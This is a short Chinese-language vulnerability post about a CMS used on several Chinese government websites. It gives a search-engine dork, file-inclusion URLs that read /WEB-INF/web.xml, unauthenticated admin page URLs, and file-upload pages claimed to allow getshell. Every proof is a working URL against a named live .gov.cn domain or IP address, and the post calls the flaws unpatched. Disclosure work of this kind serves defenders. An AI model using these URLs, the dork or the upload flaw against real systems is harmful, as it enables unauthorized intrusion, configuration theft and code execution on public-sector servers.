关键字 inurl:website/deptwebsite/Content.jsp?filePath=/
0x00:文件包含漏洞(通用型)
说明:测试中,直接访问web.xml是不可访问的,通过该漏洞可成功读取内容。
测试url:Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
漏洞证明:
http://www.nxbb.gov.cn/website/deptwebsite/0566/Content.jsp?issueId=38603&msgType=00&filePath=//WEB-INF/web.xml
http://www.dayawan.gov.cn/website/deptwebsite/0109/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
http://www.gdnx.gov.cn/website/deptwebsite/0477/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
0x01:未授权访问(通用型)
漏洞证明:
http://www.gdnx.gov.cn/portal/admin/video/AddVideo.jsp
http://www.dayawan.gov.cn/portal/admin/offdocsearch/addItem.jsp
http://www.dayawan.gov.cn/portal/admin/video/AddVideo.jsp
很多页面,不再举例……
0x02:文件上传导致任意代码执行(黑吧安全网部分通用)
说明:测试中未发现明确的版本信息,通过测试,某一类版本的存在任意文件上传导致直接getshell的漏洞。
漏洞证明:
http://59.39.89.120/portal/admin/gazette/InsertFile.jsp
http://market.heyuan.gov.cn/ portal/admin/gazette/InsertFile.jsp
成功上传后,可通过查看源码查找文件目录。
漏洞证明:
继续关注该套cms等待补丁升级
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;